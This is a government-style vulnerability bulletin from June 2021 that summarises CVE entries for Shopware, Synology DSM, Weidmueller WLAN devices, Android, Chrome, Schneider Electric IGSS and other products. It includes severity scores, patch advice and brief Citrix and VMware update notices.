Shopware is an open source eCommerce platform. Potential session hijacking of store customers exists in versions below 6.3.5.2. We recommend updating to the current version 6.3.5.2. You can get the update to 6.3.5.2 regularly via the Auto-Updater or directly via the download overview. For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. 2021-06-24 not yet calculated CVE-2021-32710
CONFIRM
MISC
shopware — shopware
 
Shopware is an open source eCommerce platform. Creation of order credits was not validated by ACL in admin orders. Users are recommended to update to the current version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly via the download overview. For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. 2021-06-24 not yet calculated CVE-2021-32709
CONFIRM
shopware — shopware
 
Shopware is an open source eCommerce platform. In versions prior to 6.4.1.1 private files are publicly accessible with Cloud Storage providers when the hashed URL is known. Users are recommended to first change their configuration to set the correct visibility according to the documentation. The visibility must be at the same level as `type`. When the storage is saved on Amazon AWS we recommend disabling public access to the bucket containing the private files: docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html. Otherwise, update to Shopware 6.4.1.1 or install or update the Security plugin (store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659) and run the command `./bin/console s3:set-visibility` to correct your cloud file visibilities. 2021-06-24 not yet calculated CVE-2021-32717
MISC
CONFIRM
MISC
shopware — shopware
 
Shopware is an open source eCommerce platform. Versions prior to 5.6.10 suffer from an authenticated stored XSS vulnerability in the administration. Users are recommended to update to version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview. 2021-06-24 not yet calculated CVE-2021-32713
CONFIRM
MISC
MISC
sonicwall — sonicos
 
A vulnerability in SonicOS where the HTTP server response leaks partial memory when a crafted HTTP request is sent; this can potentially lead to an internal sensitive data disclosure vulnerability. 2021-06-23 not yet calculated CVE-2021-20019
CONFIRM
synology — diskstation_manager
 
Use after free vulnerability in file transfer protocol component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to execute arbitrary code via unspecified vectors. 2021-06-23 not yet calculated CVE-2021-27649
CONFIRM
synology — synology_diskstation_manager
 
Improper limitation of a pathname to a restricted directory (‘Path Traversal’) vulnerability in webapi component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to write arbitrary files via unspecified vectors. 2021-06-23 not yet calculated CVE-2021-29087
CONFIRM
synology — synology_diskstation_manager
 
Exposure of sensitive information to an unauthorized actor vulnerability in webapi component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to obtain sensitive information via unspecified vectors. 2021-06-23 not yet calculated CVE-2021-29086
CONFIRM
synology — synology_diskstation_manager
 
Improper neutralization of special elements in output used by a downstream component (‘Injection’) vulnerability in file sharing management component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to read arbitrary files via unspecified vectors. 2021-06-23 not yet calculated CVE-2021-29085
CONFIRM
synology — synology_diskstation_manager
 
Improper neutralization of special elements in output used by a downstream component (‘Injection’) vulnerability in Security Advisor report management component in Synology DiskStation Manager (DSM) before 6.2.3-25426-3 allows remote attackers to read arbitrary files via unspecified vectors. 2021-06-23 not yet calculated CVE-2021-29084
CONFIRM
tripplite — tripplite_su2200rtxl2ua
 
A stored cross-site scripting (XSS) vulnerability was discovered in /Forms/device_vars_1 on TrippLite SU2200RTXL2Ua with firmware version 12.04.0055. This vulnerability allows authenticated attackers to obtain other users’ information via a crafted POST request. 2021-06-25 not yet calculated CVE-2020-26801
MISC
MISC
MISC
tsmuxer — tsmuxer
 
Heap based buffer overflow in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file. 2021-06-23 not yet calculated CVE-2021-34067
MISC
CONFIRM
tsmuxer — tsmuxer
 
Heap based buffer overflow in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file. 2021-06-23 not yet calculated CVE-2021-34068
CONFIRM
MISC
tsmuxer — tsmuxer
 
Divide-by-zero bug in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file. 2021-06-23 not yet calculated CVE-2021-34069
MISC
CONFIRM
tsmuxer — tsmuxer
 
Out-of-bounds Read in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file. 2021-06-23 not yet calculated CVE-2021-34070
CONFIRM
MISC
tsmuxer — tsmuxer
 
Heap based buffer overflow in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file. 2021-06-23 not yet calculated CVE-2021-34071
CONFIRM
ubuntu — gfs2
 
A flaw was discovered in the gfs2 file system’s handling of ACLs (access control lists). An unprivileged local attacker could exploit this flaw to gain access to or execute any file stored in the gfs2 file system. 2021-06-22 not yet calculated CVE-2010-2525
MISC
MISC
vaadin — flow
 
URL encoding error in the development mode handler in com.vaadin:flow-server versions 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows a local user to execute arbitrary JavaScript code by opening a crafted URL in a browser. 2021-06-24 not yet calculated CVE-2021-33604
CONFIRM
CONFIRM
vaadin — flow
 
Improper sanitization of path in the default RouteNotFoundError view in com.vaadin:flow-server versions 1.0.0 through 1.0.14 (Vaadin 10.0.0 through 10.0.18), 1.1.0 prior to 2.0.0 (Vaadin 11 prior to 14), 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), and 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows a network attacker to enumerate all available routes via a crafted HTTP request when the application is running in production mode and no custom handler for NotFoundException is provided. 2021-06-24 not yet calculated CVE-2021-31412
CONFIRM
CONFIRM
vmware — carbon_black_app_control
 
VMware Carbon Black App Control 8.0, 8.1, 8.5 prior to 8.5.8, and 8.6 prior to 8.6.2 has an authentication bypass. A malicious actor with network access to the VMware Carbon Black App Control management server might be able to obtain administrative access to the product without the need to authenticate. 2021-06-23 not yet calculated CVE-2021-21998
MISC
vmware — multiple_products
 
VMware Tools for Windows (11.x.y prior to 11.2.6), VMware Remote Console for Windows (12.x prior to 12.0.1), VMware App Volumes (2.x prior to 2.18.10 and 4 prior to 2103) contain a local privilege escalation vulnerability. An attacker with normal access to a virtual machine may exploit this issue by placing a malicious file renamed as `openssl.cnf` in an unrestricted directory which would allow code to be executed with elevated privileges. 2021-06-23 not yet calculated CVE-2021-21999
MISC
MISC
webport — webport
 
Cross Site Scripting (XSS) vulnerability in WebPort <=1.19.1 via the connection name parameter in type-conn. 2021-06-24 not yet calculated CVE-2020-18664
MISC
MISC
webport — webport
 
Directory Traversal vulnerability in WebPort <=1.19.1 in tags of system settings. 2021-06-24 not yet calculated CVE-2020-18665
MISC
MISC
webport — webport
 
SQL Injection vulnerability in WebPort <=1.19.1 via the new connection name parameter in type-conn. 2021-06-24 not yet calculated CVE-2020-18667
MISC
MISC
webport — webport
 
Cross Site Scripting (XSS) vulnerability in WebPort <=1.19.1 via the description parameter to script/listcalls. 2021-06-24 not yet calculated CVE-2020-18668
MISC
MISC
weidmueller — industrial_wlan_devices

In Weidmueller Industrial WLAN devices in multiple versions an exploitable privilege escalation vulnerability exists in the iw_console functionality. A specially crafted menu selection string can cause an escape from the restricted console, resulting in system access as the root user. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33528
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable command injection vulnerability exists in the iw_webs functionality. A specially crafted diagnostic script file name can cause user input to be reflected in a subsequent iw_system call, resulting in remote control over the device. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33532
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable denial-of-service vulnerability exists in ServiceAgent functionality. A specially crafted packet can cause an integer underflow, triggering a large memcpy that will access unmapped or out-of-bounds memory. An attacker can send this packet while unauthenticated to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33536
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable command injection vulnerability exists in the iw_webs functionality. A specially crafted iw_serverip parameter can cause user input to be reflected in a subsequent iw_system call, resulting in remote control over the device. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33533
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable command injection vulnerability exists in the hostname functionality. A specially crafted entry to network configuration information can cause execution of arbitrary system commands, resulting in full control of the device. An attacker can send various authenticated requests to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33534
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable format string vulnerability exists in the iw_console conio_writestr functionality. A specially crafted time server entry can cause an overflow of the time server buffer, resulting in remote code execution. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33535
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable command injection vulnerability exists in the encrypted diagnostic script functionality of the devices. A specially crafted diagnostic script file can cause arbitrary busybox commands to be executed, resulting in remote control over the device. An attacker can send a diagnostic script while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33530
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable remote code execution vulnerability exists in the iw_webs configuration parsing functionality. A specially crafted user name entry can cause an overflow of an error message buffer, resulting in remote code execution. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33537
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable improper access control vulnerability exists in the iw_webs account settings functionality. A specially crafted user name entry can cause the overwrite of an existing user account password, resulting in remote shell access to the device as that user. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33538
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable authentication bypass vulnerability exists in the hostname processing. A specially configured device hostname can cause the device to interpret selected remote traffic as local traffic, resulting in a bypass of web authentication. An attacker can send authenticated SNMP requests to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33539
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions the usage of hard-coded cryptographic keys within the service agent binary allows for the decryption of captured traffic across the network from or to the device. 2021-06-25 not yet calculated CVE-2021-33529
CONFIRM
weidmueller — industrial_wlan_devices
 
In Weidmueller Industrial WLAN devices in multiple versions an exploitable use of hard-coded credentials vulnerability exists in multiple iw_* utilities. The device operating system contains an undocumented encryption password, allowing for the creation of custom diagnostic scripts. An attacker can send diagnostic scripts while authenticated as a low privilege user to trigger this vulnerability. 2021-06-25 not yet calculated CVE-2021-33531
CONFIRM
weseek — growi
 
NoSQL injection vulnerability in GROWI versions prior to v4.2.20 allows a remote attacker to obtain and/or alter the information stored in the database via unspecified vectors. 2021-06-22 not yet calculated CVE-2021-20736
MISC
MISC
weseek — growi
 
Improper authentication vulnerability in GROWI versions prior to v4.2.20 allows a remote attacker to view the unauthorized pages without access privileges via unspecified vectors. 2021-06-22 not yet calculated CVE-2021-20737
MISC
MISC
wordpress — wordpress
 
The Comments Like Dislike WordPress plugin before 1.1.4 allows users to like/dislike posted comments, however it does not prevent them from replaying the AJAX request to add a like. This allows any user (even unauthenticated) to add unlimited likes/dislikes to any comment. The plugin appears to have some Restriction modes, such as Cookie Restriction, IP Restrictions, and Logged In User Restriction; however, they do not prevent such an attack as they only check client side. 2021-06-21 not yet calculated CVE-2021-24379
CONFIRM
zoho — manageengine_adselfservice_plus
 
Zoho ManageEngine ADSelfService Plus through 6101 is vulnerable to unauthenticated Remote Code Execution while changing the password. 2021-06-25 not yet calculated CVE-2021-28958
MISC
MISC
zte — smart_stb_product
 
A smart STB product of ZTE is impacted by a permission and access control vulnerability. Due to insufficient protection of a system application, attackers could use this vulnerability to tamper with the system desktop and affect system customization functions. This affects: ZXV10 B860H V5.0, V83011303.0010, V83011303.0016. 2021-06-24 not yet calculated CVE-2021-21737
MISC


Citrix Releases Security Updates for Hypervisor

06/25/2021 06:39 AM EDT

Original release date: June 25, 2021

Citrix has released security updates to address vulnerabilities in Hypervisor. An attacker could exploit these vulnerabilities to cause a denial-of-service condition.

CISA encourages users and administrators to review Citrix Security Update CTX316325 and apply the necessary updates.


VMware Releases Security Updates

06/23/2021 07:26 AM EDT

Original release date: June 23, 2021

VMware has released security updates to address vulnerabilities in the VMware Carbon Black App Control management server as well as VMware Tools for Windows, VMware Remote Console for Windows, and VMware App Volumes. An attacker could exploit these vulnerabilities to take control of an affected system.

CISA encourages users and administrators to review VMware Security Advisories VMSA-2021-0012 and VMSA-2021-0013 and apply the necessary updates.


Vulnerability Summary for the Week of June 14, 2021

06/21/2021 07:16 AM EDT

Original release date: June 21, 2021

 

High Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
bloofox — bloofoxcms bloofoxCMS 0.5.2.1 is infected with Unrestricted File Upload that allows attackers to upload malicious files (ex: php files). 2021-06-16 7.5 CVE-2020-35760
MISC
google — android In avrc_msg_cback of avrc_api.cc, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-8.1, Android-9, Android-10. Android ID: A-177611958 2021-06-11 10 CVE-2021-0474
MISC
google — android In memory management driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-183464866 2021-06-11 7.2 CVE-2021-0489
MISC
google — android In memory management driver, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-183461321 2021-06-11 7.2 CVE-2021-0498
MISC
google — android In memory management driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-183461320 2021-06-11 7.2 CVE-2021-0497
MISC
google — android In memory management driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-183467912 2021-06-11 7.2 CVE-2021-0496
MISC
google — android In memory management driver, there is a possible out of bounds write due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-183459083 2021-06-11 7.2 CVE-2021-0495
MISC
google — android In memory management driver, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-183461318 2021-06-11 7.2 CVE-2021-0494
MISC
google — android In memory management driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-183461317 2021-06-11 7.2 CVE-2021-0493
MISC
google — android In memory management driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-183459078 2021-06-11 7.2 CVE-2021-0492
MISC
google — android In memory management driver, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-183461315 2021-06-11 7.2 CVE-2021-0491
MISC
google — android In memory management driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-183464868 2021-06-11 7.2 CVE-2021-0490
MISC
google — android In onCreate of CalendarDebugActivity.java, there is a possible way to export calendar data to the sdcard without user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-174046397 2021-06-11 7.2 CVE-2021-0487
MISC
google — android In onActivityResult of EditUserPhotoController.java, there is a possible access of unauthorized files due to an unexpected URI handler. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-8.1, Android-9, Android-10, Android-11. Android ID: A-172939189 2021-06-11 9.3 CVE-2021-0481
MISC
google — android In getMinimalSize of PipBoundsAlgorithm.java, there is a possible bypass of restrictions on background processes due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-174302616 2021-06-11 7.2 CVE-2021-0485
MISC
google — android In notifyScreenshotError of ScreenshotNotificationsController.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-8.1, Android-9. Android ID: A-178189250 2021-06-11 7.2 CVE-2021-0477
MISC
google — android An improper input validation vulnerability in sflacfd_get_frm() in libsflacextractor library prior to SMR MAY-2021 Release 1 allows attackers to execute arbitrary code on mediaextractor process. 2021-06-11 7.5 CVE-2021-25387
MISC
google — android An improper input validation vulnerability in sdfffd_parse_chunk_FVER() in libsdffextractor library prior to SMR MAY-2021 Release 1 allows attackers to execute arbitrary code on mediaextractor process. 2021-06-11 7.5 CVE-2021-25386
MISC
google — android An improper input validation vulnerability in sdfffd_parse_chunk_PROP() in libsdffextractor library prior to SMR MAY-2021 Release 1 allows attackers to execute arbitrary code on mediaextractor process. 2021-06-11 7.5 CVE-2021-25385
MISC
google — android An improper input validation vulnerability in sdfffd_parse_chunk_PROP() with Sample Rate Chunk in libsdffextractor library prior to SMR MAY-2021 Release 1 allows attackers to execute arbitrary code on mediaextractor process. 2021-06-11 7.5 CVE-2021-25384
MISC
google — android An improper input validation vulnerability in scmn_mfal_read() in libsapeextractor library prior to SMR MAY-2021 Release 1 allows attackers to execute arbitrary code on mediaextractor process. 2021-06-11 7.5 CVE-2021-25383
MISC
google — android In on_l2cap_data_ind of btif_sock_l2cap.cc, there is possible memory corruption due to a use after free. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-10. Android ID: A-175686168 2021-06-11 8.3 CVE-2021-0475
MISC
google — android In rw_t3t_process_error of rw_t3t.cc, there is a possible double free due to uninitialized data. This could lead to remote code execution over NFC with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9, Android-10, Android-11, Android-8.1. Android ID: A-179687208 2021-06-11 8.3 CVE-2021-0473
MISC
google — android An improper access control vulnerability in genericssoservice prior to SMR JUN-2021 Release 1 allows local attackers to execute protected activity with system privilege via untrusted applications. 2021-06-11 7.2 CVE-2021-25412
MISC

Medium Vulnerabilities

Primary Vendor — Product   Description   Published   CVSS Score   Source & Patch Info
bestwebsoft — visitors_online The Visitors WordPress plugin through 0.3 is affected by an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability. The plugin would display the user’s user agent string without validation or encoding within the WordPress admin panel. 2021-06-14 4.3 CVE-2021-24350
CONFIRM
bloofox — bloofoxcms bloofoxCMS 0.5.2.1 is infected with Path traversal in the ‘fileurl’ parameter that allows attackers to read local files. 2021-06-16 4 CVE-2020-35762
MISC
bloofox — bloofoxcms bloofoxCMS 0.5.2.1 is infected with a CSRF Attack that leads to an attacker editing any file content (Locally/Remotely). 2021-06-16 4.3 CVE-2020-35759
MISC
google — android In FindOrCreatePeer of btif_av.cc, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-9, Android-10. Android ID: A-169252501 2021-06-11 6.9 CVE-2021-0476
MISC
google — android An improper input validation vulnerability in NPU firmware prior to SMR MAY-2021 Release 1 allows arbitrary memory write and code execution. 2021-06-11 4.6 CVE-2021-25396
MISC
google — android In BinderDiedCallback of MediaCodec.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-173791720 2021-06-11 6.9 CVE-2021-0482
MISC
google — android In startIpClient of ClientModeImpl.java, there is a possible identifier which could be used to track a device. This could lead to remote information disclosure to a proximal attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10. Android ID: A-154114734 2021-06-11 5 CVE-2021-0466
MISC
google — android Improper authorization in SDP SDK prior to SMR JUN-2021 Release 1 allows access to internal storage. 2021-06-11 5 CVE-2021-25417
MISC
google — android In shouldLockKeyguard of LockTaskController.java, there is a possible way to exit App Pinning without a PIN due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-9, Android-10. Android ID: A-176801033 2021-06-11 4.6 CVE-2021-0472
MISC
google — android Improper sanitization of incoming intent in Samsung Contacts prior to SMR JUN-2021 Release 1 allows local attackers to copy or overwrite arbitrary files with Samsung Contacts privilege. 2021-06-11 4.6 CVE-2021-25414
MISC
google — android A possible out of bounds write vulnerability in NPU driver prior to SMR JUN-2021 Release 1 allows arbitrary memory write. 2021-06-11 4.6 CVE-2021-25407
MISC
MISC
google — android A possible buffer overflow vulnerability in NPU driver prior to SMR JUN-2021 Release 1 allows arbitrary memory write and code execution. 2021-06-11 4.6 CVE-2021-25408
MISC
google — android A use after free vulnerability via race condition in MFC charger driver prior to SMR MAY-2021 Release 1 allows arbitrary write given a radio privilege is compromised. 2021-06-11 4.4 CVE-2021-25394
MISC
google — android A race condition in MFC charger driver prior to SMR MAY-2021 Release 1 allows local attackers to bypass signature check given a radio privilege is compromised. 2021-06-11 4.4 CVE-2021-25395
MISC
google — android In createPendingIntent of SnoozeHelper.java, there is a possible broadcast intent containing a sensitive identifier. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-8.1, Android-9. Android ID: A-174493336 2021-06-11 4.3 CVE-2021-0480
MISC
google — chrome Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 6.8 CVE-2021-30551
MISC
MISC
google — chrome Use after free in Extensions in Google Chrome prior to 91.0.4472.101 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 6.8 CVE-2021-30552
MISC
MISC
google — chrome Use after free in Network service in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 6.8 CVE-2021-30553
MISC
MISC
google — chrome Use after free in Spell check in Google Chrome prior to 91.0.4472.101 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 6.8 CVE-2021-30549
MISC
MISC
google — chrome Use after free in Loader in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 6.8 CVE-2021-30548
MISC
MISC
google — chrome Out of bounds write in ANGLE in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. 2021-06-15 6.8 CVE-2021-30547
MISC
MISC
kohsei-works — yes/no_chart The Yes/No Chart WordPress plugin before 1.0.12 did not sanitise its sid shortcode parameter before using it in a SQL statement, allowing medium privilege users (contributor+) to perform Blind SQL Injection attacks. 2021-06-14 4 CVE-2021-24360
CONFIRM
phpcms — phpcms Directory Traversal vulnerability in phpCMS 9.1.13 via the q parameter to public_get_suggest_keyword. 2021-06-16 5 CVE-2020-22200
MISC
posimyth — the_plus_addons_for_elementor The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.11 did not properly check that a user requesting a password reset was the legitimate user, allowing an attacker to send an arbitrary reset password email to a registered user on behalf of the WordPress site. Such issue could be chained with an open redirect (CVE-2021-24358) in version below 4.1.10, to include a crafted password reset link in the email, which would lead to an account takeover. 2021-06-14 5 CVE-2021-24359
MISC
CONFIRM
posimyth — the_plus_addons_for_elementor The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.10 did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an Open Redirect issue. 2021-06-14 5.8 CVE-2021-24358
MISC
CONFIRM
samsung — galaxy_watch_active_2_firmware Improper authentication vulnerability in Tizen bluetooth-frwk prior to Firmware update JUN-2021 Release allows bluetooth attacker to take over the user’s bluetooth device without user awareness. 2021-06-11 5.8 CVE-2021-25424
MISC
samsung — health Improper check vulnerability in Samsung Health prior to version 6.17 allows attacker to read internal cache data via exported component. 2021-06-11 5 CVE-2021-25425
MISC
samsung — internet Improper component protection vulnerability in Samsung Internet prior to version 14.0.1.62 allows untrusted applications to execute arbitrary activity in specific condition. 2021-06-11 4.4 CVE-2021-25418
MISC
schneider-electric — interactive_graphical_scada_system A CWE-787: Out-of-bounds write vulnerability exists in IGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in loss of data or remote code execution due to lack of proper validation of user-supplied data, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22754
MISC
schneider-electric — interactive_graphical_scada_system A CWE-787: Out-of-bounds write vulnerability exists in IGSS Definition (Def.exe) V15.0.0.21041 and prior that could result in loss of data or remote code execution due to missing length checks, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22750
MISC
schneider-electric — interactive_graphical_scada_system A CWE-787: Out-of-bounds write vulnerability exists in IGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in disclosure of information or execution of arbitrary code due to lack of input validation, when a malicious CGF (Configuration Group File) file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22751
MISC
schneider-electric — interactive_graphical_scada_system A CWE-787: Out-of-bounds write vulnerability exists in IGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in loss of data or remote code execution due to missing size checks, when a malicious WSP (Workspace) file is being parsed by IGSS Definition. 2021-06-11 6.8 CVE-2021-22752
MISC
schneider-electric — interactive_graphical_scada_system A CWE-125: Out-of-bounds read vulnerability exists in IGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in loss of data or remote code execution due to missing length checks, when a malicious WSP file is being parsed by IGSS Definition. 2021-06-11 6.8 CVE-2021-22753
MISC
schneider-electric — interactive_graphical_scada_system A CWE-125: Out-of-bounds read vulnerability exists in IGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in disclosure of information or remote code execution due to lack of sanity checks on user-supplied input data, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22757
MISC
schneider-electric — interactive_graphical_scada_system A CWE-787: Out-of-bounds write vulnerability exists in IGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in disclosure of information or remote code execution due to lack of sanity checks on user-supplied data, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22755
MISC
schneider-electric — interactive_graphical_scada_system A CWE-125: Out-of-bounds read vulnerability exists in IGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in disclosure of information or remote code execution due to lack of user-supplied data validation, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22756
MISC
schneider-electric — interactive_graphical_scada_system A CWE-824: Access of uninitialized pointer vulnerability exists in IGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in loss of data or remote code execution due to lack of validation of user-supplied input data, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22758
MISC
schneider-electric — interactive_graphical_scada_system A CWE-763: Release of invalid pointer or reference vulnerability exists in IGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in loss of data or remote code execution due to missing checks of user-supplied input data, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22760
MISC
schneider-electric — interactive_graphical_scada_system A CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability exists in IGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in disclosure of information or remote code execution due to missing length check on user supplied data, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22761
MISC
schneider-electric — interactive_graphical_scada_system A CWE-22: Improper Limitation of a Pathname to a Restricted Directory vulnerability exists in IGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in remote code execution, when a malicious CGF or WSP file is being parsed by IGSS Definition. 2021-06-11 6.8 CVE-2021-22762
MISC
schneider-electric — interactive_graphical_scada_system A CWE-416: Use after free vulnerability exists in IGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in loss of data or remote code execution due to use of unchecked input data, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22759
MISC

Low Vulnerabilities

Primary Vendor — Product   Description   Published   CVSS Score   Source & Patch Info
bloofox — bloofoxcms bloofoxCMS 0.5.2.1 is infected with XSS that allows remote attackers to execute arbitrary JS/HTML Code. 2021-06-16 3.5 CVE-2020-35761
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the xorg-hwe-18.04 package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32555
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the xorg package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32554
MISC
